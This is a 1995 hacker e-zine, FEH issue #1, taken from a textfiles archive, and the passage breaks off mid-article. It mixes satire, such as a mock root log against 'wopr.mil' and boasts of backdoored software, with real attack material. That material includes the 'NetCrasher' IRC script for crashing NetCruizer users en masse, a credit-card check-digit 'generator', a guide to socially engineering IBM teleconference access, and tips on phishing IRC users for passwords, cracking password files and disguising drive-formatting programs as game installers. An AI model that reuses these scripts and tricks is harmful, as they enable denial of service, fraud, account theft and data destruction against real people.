informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/100/feh-1

1415 lines
53 KiB
Plaintext
Raw Blame History

FFFFFFF EEEEEEE HHH HHH
FFF EEE HHH HHH
FFFFFFF EEEEEE HHHHHHHHHH
FFF EEEEEE HHHHHHHHHH
FFF EEE HHH HHH
FFF EEEEEEEE HHH HHH
U L A
X E X
I E O
N' T R
Issue #1
July 1st, 1995
Editor: ReDragon
Fuxin' Eleet Haxor of the Month: Hotrod
Fuxin' Eleet Haxor Member List: TOP SECRET
Official FEH Porn Supplier: twi
Official passed out drunk of FEH: y
Official FEH bartender: thomas
Chicago subsidiary of FEH: l0ck
Official FEH Historian: SnoCrash
Official FEH Warez Supplier: X
Official FEH telco security: Dale Drew
Official FEH distribution: Dark Tangent
Official Vehicle of FEH: Saab
Official Song of FEH: Thriller
Official Alcoholic Drink of FEH: Goldshlager
Official domain of FEH: feh.org
Our current email address: feh@pussy.org
Greetz To (if we left you out, itz cuz we dont got yer inpho) :
aky, al, albatross, antichrist, armitage, artimage, baccahbar,
barnasch, basehead, bedlam, blackdeath, blackfire, bluesman, c-curve,
c_cipher, captain ahab, captain hook, ccrider, cerbus, chaos, clovis,
corak, crax, crimelord, crushed puppy, cyntaxera, cyrix, d-fens, datarape,
deathstar, defcon4, deker, digital, discodan, diskjockey, dob, dr. freeze,
dragonlady, drd00m, dreamweaver, drmenace, drunkfux, drwarfare, dupre,
eek, elastic, erikb, eternal, etrigan, excelsior, firefly, fisch,
frank carson, freiheit, friede, genx, gfm, gheap, ghornet, grayareas,
greylock, greystone, harvard, hellfire, henry, hos, howcum, hypnosis,
interrupt, joybubbles, kc, kewp, kl, kracker, kurupt, leigh, lexicdvl,
liquidice, loq, lordoptic, m0rph, mafiaman, malice, meowmix, mindcrime,
mindscrew, moonchild, mrpurple, mrx, musicphreak, mycroft, nc-17, neophyte,
niaht, nimrod, nitro187, noel, novocain, nyar, nynex, olphart, omega,
opiate, oreo, pandora, paradox, pclord, plant, play, pmf, purpcon, pyro,
qwik, r-a-d, radikahl, radman, rahdude, ratscabies, razor, rebel, redskull,
rhit, roach, scojack, sevenup, silicon, sl, slammer, slpwalker, socket,
solstice, sparhawk, speedrcr, sphice, splice, sserpent, stealth, strauhd,
studload, subzero, swinder, tedbundy, tek, tekone, tele, tewph, tinyz,
totlvizn, tsoul, utahsaint, valgamon, virus, visionary, winter, wozz,
xn4rk, xymox, z1nk, zaphod, zorphix
Ahoy!
That's how Alexander Graham Bell used to answer his phone.
For some reason, it never caught on...
Well, here it is. The first issue of FEH, a 'zine in its incarnation already
famous and destined for greatness. Richard Steele, ex-cia agent, says of
FEH, "my penis is HUGE". While I'm not sure exactly how this relates to FEH,
he IS ex-cia, so we better publish whatever he says. Erik Bloodaxe, aka
Chris G., when asked about the prospects of facing a FEH issue against Phrack,
exclaimed "dude, i own you. i mean, we're all running yer scripts anyhow."
Grayarea, publisher of, oddly enough, grayareas, wrote about our release,
"spell it Gray Areas." Perhaps most impressive of all, Emmanuel Goldstein,
when faced with the certain demise of 2600 given FEH's release, commented
"will you leave me alone if i give you a quote?" And so, without further
adieu, I present to you, FEH #1.
Table of Contents:
1. Intro (you've already read that part if you've gotten this far)
2. Table of Contents (maximum recursion depth exceeded)
3. Editorial by Fuxin' Eleet Haxors
4. /var/spool/mail/feh
5. Some C code by Fuxin' Eleet Haxors
6. hack logs by Fuxin' Eleet Haxors
7. "Just how eleet is FEH" by Rasputin Worldmonger (thats not his real nick)
8. "Teleconf stuff" by Morph (ed: this was too complicated, i didnt read it)
9. "Ways to amuse yerself" by Rush2 (other than masturbating)
10. "The Tack Story" by Hotrod
11. "The Birth of FEH" by SnoCrash
12. An Interview with Dale Drew [part 1] by ReDragon
13. "How to Hack Using Scripts [part 1] by Seven Eleven
14. "How to Hack a Toaster Oven" by bl0ke
To Submit articles for future issues of FEH (expect it to be released every
month or so), e-mail ReDragon (current address: redragon@chewy.wookie.net),
or contact him through other means (most people know where to find ReD).
// 3. Editorial
Too many people that are in the 'scene' today seem to do nothing but hoarde
things. Send me this, gimme this seems to be the prevailing attitude of the
day. If you are going to get on the net and try to hoarde anything, make it
knowledge. Spend your time learning instead of trying to get toolz out
of people and figuring out who the newest irc chick is. Sometimes that
means talking to people on irc, but most of the time that means getting out
there and doing it yourself. Its fine if you want to do the whole social
scene of hacking or phreaking or warez or ansi, they are all different but
in essence, they are all about entertainment on IRC. But at the heart of
them is a common goal, why which ultimately people are judged. Which of
these groups have the purest goals? To have all the warez? To make the
coolest ansi or demo? To setup a conf? No, its knowledge. And that's
why we are fuxin' eleet hackers. And that is our ideal. Now, you may see
us on #hack 24 hours a day, but trust me, we idle a lot, and despite the
fact that we may be active in the 'social scene' of hacking, it is what we
are doing in another window while the irc screen scrolls that makes us
fuxin' eleet, not what we do on IRC.
- All the members of FEH
// 4. /var/spool/mail/feh
Someone sent this to one of the FEH members, anonymously, so we dunno
where it came from or who wrote it. The names were removed to protect
the obviously guilty...
Most of the stuff is from my latest performance report. Prior to that I
worked in the Computer Security Branch as the Virus/Pc expert. In that
capacity I was responsible for taking care of any and all problems concerning
viruses and P.C.s. I was taken from a shop where I was doing communications
security due to my extensive knowledge of p.c.s and my decent programming
skills. They needed someone with some knowledge and foundation in taking
care of Personal Computers. I established a base line program for dealing
with computer viruses, handling copyright issues and dealing with user
problems associated with Personal Computers. We were having some difficulty
with users not being able to distinguish between viruses and program
gliches due to software problems. That's where I came in. O.k. from there
they figured out that I am very good with computers. They needed someone to
handle Network Security who could do tiger team actions and monitor our
networks. They felt due to my computer knowledge I would be the most viable
candidate. The following is directly from my performance report.
"Expert in all aspects of Wide Area Network(WAN) security support.
Responsible for executing all portions of periodic system security audits
to find and correct host security vulnerablilities. Assists HQ USAF Local
Area Network (LAN) systems administrators and customers in implementation of
security safeguards on all UNIX hosts. Proactively analyzes Network
Security Monitors (NSM) logs for indications of attempted or successful
intrusions. Systems administrator for DSST SPARC station platforms."
"Heart of the agency's newly established wide area network security program.
Developed and documented procedures for monitoring the HQUSAF backbone.
Security program has led to the most protected network within the DOD
rated by the Defense Information Systems Security Agency as the best of 9000
systems audited by its elite Center for information Security.
Performs aggressive quarterly security audits of the HQ USAF WAN.
Created software tools and new hacking techniques used by the Air Force
Information Warfare Center for their on-line surveys of worldwide sites.
Resident expert on UNIX security.
Trained counterparts throughout the agency on our methodology enabling
them to secure their networks.
Regularly called upon by outside agencies for assistance.
Expertise passed to other system administrators through articles published
in directorate's security newsletter."
"leader who has brought the agency's network security program from the
infancy stage to a mature sustainable program which has Air Force wide
recognition.
Knowledge of UNIX security and leading edge hacking techniques makes him
a valued source of information thoughout DOD."
// 5. Some C code by Fuxin' Eleet Haxors
fehit.c (we ran this through itself):
/* TH1S W1LL MAK3 Y0UR F1L3S FUX1N' 3L33T */
#1NCLUD3 <STD10.H>
#1NCLUD3 <STR1NGS.H>
#1NCLUD3 <CTYP3.H>
MA1N()
{
CHAR L1N3[100];
CHAR C;
1NT 1;
WH1L3(G3TS(L1N3))
{
F0R(1=0;L1N3[1];1++)
{
L1N3[1]=T0UPP3R(L1N3[1]);
1F(L1N3[1]=='3')
L1N3[1]='3';
1F(L1N3[1]=='1')
L1N3[1]='1';
1F(L1N3[1]=='0')
L1N3[1]='0';
}
PUTS(L1N3);
}
}
The world's most fuxin eleet credit card generator (yes it works):
main(){int i,x,n=1,t,s=0;scanf("%d",&i);for(;n<i;n++){scanf("%d",&x);
t=((n+i%2)%2+1)*x;s+=t+t/10;}printf("%i",(10-s%10)%10);}
Some random IRC script that we have no idea where it came from:
# NetCrasher -=- (c) 1995
# Utilize a nice bug in the NetCruizer IRC client to crash
# one or many NetCruizer lamers when they are using IRC.
^assign ctcpstring ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFING
ER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER
^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AF
INGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFING
ER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER
^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
^alias crash eval msg $0 $ctcpstring
alias crashall {
^assign TIME 1
^assign -DOIT
on ^raw_irc "% 352 *" {
^assign DOIT $DOIT;^timer $TIME crash $7
^assign TIME ${TIME+7}
}
on ^raw_irc "% 315 *" {
on raw_irc -"% 352 *"
on raw_irc -"% 315 *"
eval $DOIT
}
who *.ix.netcom.com
wait
echo *** Will crash ${(TIME-1)/7} users...
echo *** Time required to avoid excess flood: $TIME seconds
}
^on ^send_msg "% *^A*^A*^A*^A*^A*" echo *** Crashing NetCruizer lamer: $0
echo *** NetCrasher loaded. /crash <nick> to crash a single NetCruizer lamer
echo *** /crashall to crash all NetCruizer lamers off IRC (will lag you)
echo *** Note that users crash immediately but do not leave IRC until the
echo *** server gives them a ping timeout.
Secure your PC using your joystick to enter your password:
[ed note: whoever wrote this should be shot, unless they have greatly
grown and only code in C now and anyhow I was only like 13
when I wrote it so gimme a break, fuck you ed!]
{$M 1024,0,1024}
uses dos,crt;
var TimeTick : procedure;
type joystickrec = record
b1 : boolean; b2 : boolean; x : word;y : word; end;
plist = record
pbyte : byte; next : pointer; end;
var joy : joystickrec; pass: boolean;isleft: boolean;
leftit: byte; rightit: byte;pb: byte;i:byte;
pfile: file of byte;xl,xc,xr : boolean;
yu,yc,yd : boolean;a,b:pointer;
pl,pl1: ^plist;
procedure brk;
interrupt;
begin
end;
procedure readjoystick(var joystick:joystickrec);
var regs: registers;
begin
regs.ah:=$84;
regs.dx:=$00;
intr($15,regs);
if (regs.al AND 16)=0 then joystick.b1:=true else
joystick.b1:=false;
if (regs.al AND 32)=0 then joystick.b2:=true else
joystick.b2:=false;
regs.ah:=$84;
regs.dx:=$01;
intr($15,regs);
joystick.x:=regs.ax;
joystick.y:=regs.bx;
xl:=false; xc:=false; xr:=false;
yu:=false; yc:=false; yd:=false;
with joystick do begin
if x<10 then xl:=true;
if (x>=50) and (x<=150) then xc:=true;
if (x>150) then xr:=true;
if (y<10) then yu:=true;
if (y>50) and (y<100) then yc:=true;
if (y>100) then yd:=true;
end;
end;
procedure writetf(bol:boolean);
begin
if bol then write('True ') else write('False ');
end;
procedure readfail;
begin
writeln('Verifying Joystick Input....');
writeln('Unable to Verify Password - System Halted');
halt(0);
end;
procedure xcenter;
begin
with joy do begin
repeat
readjoystick(joy);
if (not yc) then pass:=false;
until xc or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;
procedure ycenter;
begin
with joy do begin
repeat
readjoystick(joy);
if (not xc) then pass:=false;
until yc or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;
procedure left;
begin
with joy do begin
repeat
readjoystick(joy);
if (not yc) or (xr) then pass:=false;
until xl or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;
procedure right;
begin
with joy do begin
repeat
readjoystick(joy);
if (not yc) or (xl) then pass:=false;
until xr or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;
procedure up;
begin
with joy do begin
repeat
readjoystick(joy);
if (not xc) or (yd) then pass:=false;
until yu or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;
procedure down;
begin
with joy do begin
repeat
readjoystick(joy);
if (not xc) or (yu) then pass:=false;
until yd or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;
procedure press1;
begin
with joy do begin
repeat
readjoystick(joy);
if (b2) then pass:=false;
until b1;
if (b1 and b2) then readfail;
end;
end;
procedure press2;
begin
with joy do begin
repeat
readjoystick(joy);
if (b1) then pass:=false;
until b2;
if (b1 and b2) then readfail;
end;
end;
procedure nopress1;
begin
with joy do begin
repeat
readjoystick(joy);
if (b2) then pass:=false;
until (not b1);
if (b1 and b2) then readfail;
end;
end;
procedure nopress2;
begin
with joy do begin
repeat
readjoystick(joy);
if (b1) then pass:=false;
until (not b2);
if (b1 and b2) then readfail;
end;
end;
begin
readjoystick(joy);
Writeln('Joystick Password Verification');
Writeln('------------------------------');
Writeln('Please Input Your Password with the Joystick Now');
Writeln('Press both joystick buttons simultaneously to verify your password.');
getintvec($1b,a);
getintvec($23,b);
setintvec($1b,@brk);
setintvec($23,@brk);
assign(pfile,paramstr(1));
{$I-} reset(pfile); {$I+}
if ioerror<>0 then begin
writeln('Could Not Read Password - System Halted');
repeat until 1=0;
end;
new(pl);
while not eof(pfile) do begin
read(pfile,pb);
pl^.pbyte:=pb;
new(pl1);
pl^.next:=pl1;
pl1^.next:=nul;
pl:=pl1;
end;
close(pfile);
repeat
pass:=true;
leftit:=0;
isleft:=false;
with joy do
begin
xr:=false;
for i:=1 to 5 do begin
xcenter;
left;
end;
xcenter; right; xcenter; up; ycenter; down; ycenter;
for i:=1 to 5 do begin
xcenter;
right;
end;
xcenter; left; xcenter; up; ycenter; down; ycenter;
for i:=1 to 4 do begin press1; nopress1; end;
for i:=1 to 3 do begin press2; nopress2; end;
for i:=1 to 2 do begin press1; nopress1; end;
press2; nopress2;
repeat
readjoystick(joy);
until (b1 and b2);
if (pass) then begin
writeln('Verifying Joystick Input...');
writeln('Password Verified - Continue');
end
end;
if (pass) then begin
gotoxy(1,18); writeln('ACCESS DENIED - INCORRECT PASSWORD');
sound(500); delay(100); nosound; delay(100); sound(500); nosound;
sound(500); delay(100); nosound; delay(100); sound(500); nosound;
end;
until pass;
setintvec($1b,a);
setintvec($23,b);
end.
// 6. Fuxin' Eleet Haxor Logs by Hotrod
As an offering to the public to prove FEH's obvious superiority to l0ck,
I decided to demonstrate a n00 h4q t3kn1qu3 recently developed in the FEH
laboratories, located on a secret island in the Atlantic ocean.
The n00 h4q t3kn1qu3 has been demonstrated on wopr.mil, once regarded as
one of the most secure machines on the net. This machine alone
determines whether or not to launch the nuclear missles of the United
States. It runs on the US Military's top secret propriatary OS "Lesb/OS".
Lesb/OS machines are no match for the awesome power of FEH.
FEH proudly offers the following:
---
Log start 5/30/95 22:17:36
feh.org# uname -a
UNICOS feh 4.3.5 #5 Tue May 30 22:17:36 EDT 1995 T3D
feh.org# whoami
root
feh.org# telnet -safe wopr.mil
Trying 194.33.43.1...
Connected to wopr.mil.
Escape character is '^]'.
Don't even think about haxoring this site, bud.
Try if you like, you will fail.
Just don't get caught, or you'll pay the price.
wopr login: root
password: (we tried root)
Login Incorrect
wopr login: root
password: (we tried no password)
Login Incorrect
wopr login: root
password: (we tried pencil)
Login Incorrect
Ok, obviously our traditional hacking methods weren't working out at this
point. We decided to go for some more sekretive methods...
wopr login: lemmein
password:
Login Incorrect
wopr login: iamfeh
password:
Login Incorrect
wopr login: HEYASSHOLEIMROOTATFEHORGLEMMEINORYOUREDEAD
password:
Welcome to Lesb/OS 2.2.12
Last Login: NEVER
News:
The Lesb/OS upgrade to 2.2.12 was successful, we apoligize for any
inconvenience this may have caused.
As of 5/28/95 @ 20:34 hours, we have been restored from Defcon 4 to
Defcon 5.
__
You have no mail.
wopr> pwd
/home/fehroot
wopr> cd /bin
wopr> ls -al sh
-rwxr-xr-x 2 bin bin 131072 Feb 3 01:53 sh
wopr> chmod 4755 sh
chmod: sh: not owner.
wopr> ~/look.im.feh.and.if.you.dont.follow.my.orders.youre.fucked
wopr# whoami
root
wopr# ftp
ftp> open feh.org
Connected to feh.org
220 feh FTP server (UNICOS feh 4.3.5 #5 Tue May 30 22:54:18 EDT 1995 T3D)
ready.
Name (feh.org:root): feh
Password (feh.org:feh):
331 Password required for feh.
230 User feh logged in.
Remote system type is UNIX.
Using binary mode for file transfers.
ftp> lcd /etc
Local directory now /etc
ftp> get fehmotd
200 PORT command successful.
150 Opening BINARY mode data connection for fehmotd (1056 bytes).
226 Transfer complete.
1056 bytes received in 0.021 secs (49 Kbytes/sec)
ftp> quit
221 Goodbye.
wopr# cp /etc/fehmotd /etc/motd
wopr# cat /etc/motd
Congratulations, You've Been Haxored by the Best!
It wasn't LOD......
It wasn't l0ck.....
It wasn't m0ck.....
It wasn't mitnick..
You've been hacked by
FFFFFF EEEEEE HH HH
FF EE HH HH
FFFFF EEEE HHHHHHH
FF EE HH HH
FF EEEEEE HH HH
uxin leet axors
You are likely to go through several stages of emotions at this point.
First, denial, then anger, then acceptance that we are the most fuxin
eleet haxors. In fact, you better hope we are, cuz if we aren't fuxin
eleet and we still haxored yer system that means that yer a pretty fuxin
shitty sysadmin now, doesn't it? FEH is roxin' the net, tell all yer
friends we will soon be visiting their site, I hope they will be kind
enough to leave the door as open as you were.
wopr#
[Subsequently removing any trace of this machine from the net deleted.]
Comments:
Easier than even we at FEH thought it would be. We drove the machine into
such fear, that in our presence it gave us root. Note that we never actually
modified anything, or even ran any new shell, the machine simply
submitted to our eliteness, and, in a possible attempt to garner mercy at
our hands, gave us root without making us go through the formalities.
Our work remains solid in this wonderful sight:
feh.org# whois -h nic.ddn.mil wopr.mil
No match for "WOPR.MIL".
Please be advised that this whois server only contains DOD Information.
All INTERNET Domain, IP Network Number, and ASN records are now kept in
the new Internet Registry, RS.INTERNIC.NET (198.41.0.5).
feh.org#
// 7. Just How Eleet Is FEH by a Fuxin' Eleet Haxor
1 AM A PR0UD M3MB3R 0F FEH. 1 SAY THAT PUBL1CALLY, 1 SAY THAT L0UDLY, 1
SAY THAT STR0NGLY, AND 1 CAN SAY THAT CUZ W3 FUX1N R00L.
W3 AR3 3L33T. N0T 0NLY THAT, BUT W3 AR3 3L1T3. 3L33T AND FUXK1NG R0CK1NG.
W3 AR3 S0 C00L THAT W3 HAV3 R3C0NF1GUR3D R0UT3RS T0 AUT0MAT1CALLY G1V3 0UR
PACK3TS H1GH3R PR10R1T13S. W3 0WN APPR0X1MAT3LY 37% 0F ALL UN1X MACH1N3S 0R
R0UT3RS 0N TH3 1NT3RN3T. W3 SN1FF C1X, MA3-3AST, TH3 CH1CAG0 NAP, AND C3RT.
1N SH0RT W3 R0CK. H0W CAN W3 R0CK TH1S MUCH, Y0U M1GHT ASK? W3LL, THAT'S
R3ALLY A S1LLY QU3ST10N, AND Y0U'D B3ST N0T ASK 1T, B3CAUS3 W3'V3 SCR1PTS
S3TUP 0N 0UR SN1FF3RS (APPR0X1MAT3LY 4000 MACH1N3S HAV3 AUT0SN1FF3R/F1LT3RS)
THAT W1LL MA1L US THAT Y0U'R3 TALK1NG AB0UT US.
1N SH0RT - WATCH 0UT. W3 AR3 TH3 P30PL3 WH0 RUN TH3 N3T. W3 AR3 TH3 P30PL3
WH0 BACKD00R3D PGP, W3 BACKD00R3D B1ND, W3 BACKD00R3D ARGUS, TCP_WRAPP3RS, AND
1F Y0U KN3W H0W MANY ST0CK B1NAR13S 1N S0LAR1S, 1R1X, AND A1X W3 HAV3 TR0JAN3D
1N TH3 C0D3R'S MACH1N3S, Y0U'D SH1T Y0UR PANTS.
W3 R3C0NF1GUR3D R0UT1NG AT TH3 NAPS AND C1X B3CAUS3 TH3 FAT FUX WH0 RUN TH3
NAPS AR3 T00 FUCK1NG STUP1D AND LAZY T0 D0 1T R1GHT. 1T D1DN'T HURT THAT TH3
PACK3TS TRAV3L 0V3R TH3 SN1FF3R'S 3TH3R, BUT 3V3N W1TH THAT 3XTRA (TRANSPAR3NT)
H0P, W3 1NCR3AS3D 3FF1C13NCY BY 3.2 %.
BUT TH3 0NLY TH1NG Y0U R3ALLY N33D T0 KN0W 1S THAT W3 AR3 FUCK1NG 3L33T,
W3 AR3 HACK3RS, AND W3 W1LL D0 WHAT W3 WANT. D0N'T TRY T0 R3S1ST US, W3 W1LL
0V3RC0M3 ANY S1LLY C3RT ADV1S0R13S Y0U PUT 0UT. W3 AR3 TH3 0N3S WH0 S3TUP
M1TN1CK'S BUST, B3CAUS3 W3 W3R3 T1R3D 0F H1S S1LLY PR3SS. W3 AR3 TH3 0N3S
WH0 MA1L3D SH1M0' TH3 L0GS. W3 AR3 FEH. W3 AR3 Y0UR FR13ND, UNT1L Y0U M0V3
AGA1NST US. AND TH3 Y0U W1LL F1ND Y0UR SYST3M, Y0UR T3L3PH0N3, Y0UR B1LLS, Y0U
L1F3, MUCH M0R3 D1FF1CULT.
L0V3 FEH - W3 AR3 Y0UR MAST3R, AND W3 AR3 Y0UR 0WN3R. B3 G00D T0 US, AND W3
W1LL TR3AT Y0U W3LL. R3B3L AND F33L PA1N.
[FEH] 3VANG3L1ST - RASPUT1N W0RLDM0NG3R
// 8. Something about Teleconferencing Stuff by Morph
An Overview of American Teleconferencing Service,
^..^ their relationship to IBM, and TiNets ^..^
(oo) - eye [Part 1] (oo) - me
( . ) phear researched and compiled by Morpheus ( . ) too
`. ' feh with thanks to Prophet and also the ` .'
. cooperative employees I spoke with. .
PHEAR PHEAR
-=FEH=- root:Donteventhinkofit:0:1:Operator:/:/bin/csh -=FEH=-
-[*.gsfc.nasa.gov:/etc/passwd]
Kopyright (k) Morpheus 1995,
all rights reserved.
[ed note: feel free to steal this and claim it as your own]
--------------------------
Introduction
--------------------------
A Canadian affiliate of CAFBL tipped me off that IBM teleconferences had been
used before through a toll free line. So I investigated how IBM teleconfs are
setup, who makes them with what software, and how to access IBM conferences.
Well I called up IBM's toll-free information line available from the 800#
index and began a very blunt attempt to socially engineer teleconfs from IBM.
The guy I talked to with told me to work through my regional directors, not
through the software information line, and he gave me the number to American
Teleconferencing Service, which exclusivly handles IBM extrenal teleconfs.
American is a southern company, located in Tousan, AZ.
This was originally designed as a scam article, a step by step guide to the
tricks and traps involved with setting up American Teleconferences through
IBM. Upon further consideration, I went back and edited the article to make
it more informational and less "LeT'z HaCk Th0sE FuCkeRz!" I am sure that the
rewording of this paper will not make fraudulent use of the information any
less compelling, but I do feel sure that half-assed phreakers would be better
off sticking with old AT&T.
[ed note:
i wish he just gave us codes, all this technical stuff makes my head hurt.]
--------------------------------------
A look at an American Teleconfernce
--------------------------------------
American Teleconferences conference setup looks like this:
===========================================
- 6500800 - TiNet Dialin - Accessible to IBM and not you.
- 7194440800 - External Dialin - Regular Telephone number.
- 157998 - Conference ID - Use this to access account and conference.
===========================================
Also, American teleconference offers an optional toll free line to dial in to
the conference. This is the only option they offer for external access to the
conferences. TiNet works from probably all IBM phone lines, by dialing 271
followed by the TiNet number.
American works on a fairly primitive conferencing system, they simply connect
each line to the other lines as they call in. There is no conference hub, so
if you're the first caller, you get put on hold until the next caller comes
in. The music sucks, i mean, this is really terrible music.
[ed note: you might like the music, some people set these confs up themselves
just so they can hear the hold music, and nobody ever calls.]
An automated conference conection does not exist, and there is no real access
code to enter. Once you dial into the conference, you are greeted by the
operator who asks you for you conference ID number and your name. A list of
names can be generated and given to the operator before the conference.
---------------------------
How American Operates
---------------------------
All IBM groups that use American have files in American's Databases.
Contained in your file is your name, title, office phone, office address,
which will also be your billing address, and your department number. This is
an example of what the file would look like when brought up on their screen:
========================== ============
Name [ Bruce Sterling ] : [ Hi Bruce ]
Dpt [ # 5176 ] : [ from the last 4 digits of phone number ]
Addr [ 227 Maple Lane ] : [ Office adress / billing adress ]
Addr [ Phila PA 19191 ] : [ Use the closest corp/office ]
Phon [ 512-323-5176 ] : [ Office Numba ]
XXXX [ Billed 1/11/11 (status) ] : [ Did yew pay your bills? ]
XXXX [ Billed 1/11/11 (status) ]
XXXX [ (Notes) ] : [ He writes books ]
========================== ============
This is certainly *not* a screen capture, so the screen the operator will see
is very probably more complex. Also the Fields represent variable areas, you
probably get a better idea of what the operator is thinking when talking to
you through this.
[ed note: the operator is probably thinking about how her life ended up
so miserably that she is working as a telephone operator.]
Billing status can include a refuse notice for delayed payment or whatever.
The Notes can be preferences, such as toll free access or possibly something
else. Callback confirmation is usually not utilized, since the bill is not
included with the phone bill, but is delivered to the billing address. Your
number appears on their terminal also, with whatever comments are attached
to that.
American has become so exclusively dedicated to serving IBM that operators
will sometimes get on and say "IBM Conference Service." I also spoke to some
operators about what software they were running and on what type of terminals
which appears to be a big secret. [ed note: probably NOT os/2]
EDICTS: Electronic Distribution Information Control Transaction System, file
transfer system. Operates RO6000 Systems. Distributed by IBM. This is one of
the programs used by American, the operator told me that much before she woke
up a bit. This is a datacommunications software package, and is seperate from
their audio / video teleconferencing software.
----------------------------------
TiNet, TiLines, and TiSystems
----------------------------------
TiNet dialins do not exist. The only way to access TiNet Services is through
IBM's phone system. TiNet is simply the telephone system IBM strung together
which makes conferencing and interoffice communications easier.
In fact, TiNet was created as a datacommunications system that ended up with
a gross excess of bandwith so they expanded into Voice Capabilities. TiLines
can be setup in virtually any office, and for any large bussiness.
Tinet's selling feature, so to speak, is that offices with TiLines installed
can bypass long distance charges and Telephone Companies all together. This
is particularly useful for Banks and Credit Unions who prefer the Security
of private phone lines than the inherent lack of security in public / normal
phone lines. [ed note: what about clipper?]
In conclusion I would like to state that all of the information mentioned is
for purely informational purposes and that, should any of you abuse IBM and
American Teleconferencing, that would be illegal and you would be prosecuted.
But then again, would any of us choose to break the law? Heavens no!
[ed note: if you do happen to break the law, drop us a note so we know that
this is useful.]
-------------------------
Fun Filled Numbers
-------------------------
IBM Software Information Service == 1-800-426-2255
IBM General Information Line == 1-800-426-3333
American Teleconference Reservation Line == 1-800-723-9093
Hooked on Phonics main order Line == 1-800-222-3334
IBM CORP main office [Philadelphia] == 215-851-2008
IBM Teleconference Director's office [Philadelphia] = 215-851-3677
The author's inpho:
Morpheus can be reached at GBA 215-750-0392 or morph@chewy.wookie.net or
morph@iia2.org. Send your public pgp key if you want a reply. Also,
you can reach him at 800/862-0094 during the day from US, or from canada,
800/925-9999 ## 719. On EFnet, he's on #hack, #zines, and #cafbl.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a
mQCNAi/R9UAAAAEEALDNmlPQJ/CmH1Ba77TmMKBaW6zUUcTrFuOe5duBZvyQpkGR
frHppvXbTXHB3jm4jHL9kCueo1IJGXfOTC4lyI/rGBr731NdwFYlsdeWh5Ampvj0
YKchVh5mp7glTQYS/rtARupXlb/H2X+wY5JgsJK1dFQJ3QfyA2bQA34kJ66RAAUR
tB9Nb3JwaGV1cyBLTCA8bW9ycGhAaXhjLml4Yy5uZXQ+
=SrJR
-----END PGP PUBLIC KEY BLOCK-----
// 9. How to amuse yourself by Rush2
[ed note: this is what people that are not FEH might try]
1. The Michael scam. One day a few days ago I got very very bored. I said
what the hell. I bet I can get a lamer to give me his/her password. I
thought of the most common name, michael, and changed my irc nick to .. DUH
Michael.. within 10 minutes someone had mistaken me for her best friend
michael.. she thanked me for somethign about hooking her up with alliance
not the service, some guy. I bullshitted for 10 minutes, then really panick
y like "Oh crap I just screwed up my account.. majorly would you gime your
login and password pleaseeeee". Wellshe was that stupid and she gave it to
me. I really wanted to know if anyone else was that stupid. I tried a lot
of common names for the next 2 hours, john, mike, larry etc..etc.. I
succeeded wiht 99% of my attempts, I got 19, failed once. SO do something
like this if you are REALLY bored.
[ed note: a bottle of scotch is far more effective than this]
2. Trade passwd files.. hehe... when your bored change yer name on irc,
go into #Hack see if you dont get kicked off and ask for passwd files..
[ed note: if you don't get kicked off, hurt everyone that was opped]
if you are really bored this can be fun and you can get some new systems
to get in.. now unless your someone that is cracking them just to get as
many accounts as you can (I feel hypocritical currently I have 1400 valid
accounts on this local provider, on my computer upstairs (in just one day
YES people in my area have easy passwds.. only a 1mb file (AND just with
login name I got 300 yesterday.. haha I) And I am hearing a lot of beeps
(root was the first cracked account:).. this is something to do if you
feel bored and lame...
[ed note: mail the cracked password file to cert@cert.org and you win a prize]
3. Write really nifty little utils in quick basic (if your still stuck
on a dos box)... nothing is niftier than writing a shitty program in
qbasic that uses a captured installation display screen from a game
or something (or modify it to say mortal combat 3 or soemthing, the little
warez kids cum from this) and really make it format their drive... yes this
is lame but you KNOW we all get this bored at one time or another in our
lives.
[ed note: Super Street Fighter is more Fuxin' Eleet]
4. Use Irc. Yes this is the lamest of the lame. #hack. Where ignorance is
shown and knowledge forgotten. If you want immaturity, brattiness, kids
playing with their krad bots or scripts, or your typical op wars, go to #hack,
#phreak, #2600, or my <coughcoughnotcoughcoug> favorite, #ansi. Yes #ansi
people with any intelligence know it is american national standards institute,
dorky little kids that have no life (we have no lives either but we arent
little kids ... we are middle kids.. ?) [ed note: if anyone can figure out
what the hell he is talking about, email me] think it is an art form and a way
for them to be cool... their idea of coolness is being worshipped by pervert
ed, immature, talentless, dweebs with pcs.. most of these peopel are aol
and prodigy rejects... ...anyways... this is something to do when you are
SUICIDALLY bored.
[ed note: actually suicide might be a better solution]
5. Get on one off those cracked accounts (see number 1) and type something
like archie -s a > hackedpws.k00l or archie -s . > HEY.YOU.STUPID.SYSADMIN.
BLOW.ME (that is sure to get his attention). If you are really bored, you
can edit their .login to cat the file when they login (this being archying <
sp> a or . will probably give you a few thousand file names and if the owner
of the account can even login (they havent checked user quotas yet obviously)
so that they must wait an hour for the thing to finish (but I'm not sure it
never has for me because i just telnet), it may just flood their com ports
(or if you have root, do archie -s a, archie -s ., archie -s (whatever you
want to to get a LOT of entries) > motd or >.login and make it so EVERY
ONE sees this when they login... unless they are on like a 2400...
This is something to do when your bored...
[ed note: do I notice a trend forming?]
6. Go onto Irc, and into #hack and let ReDragon convince you to write an
article for some magazine (JUST ANY ARTICLE) .. and spend the next (however
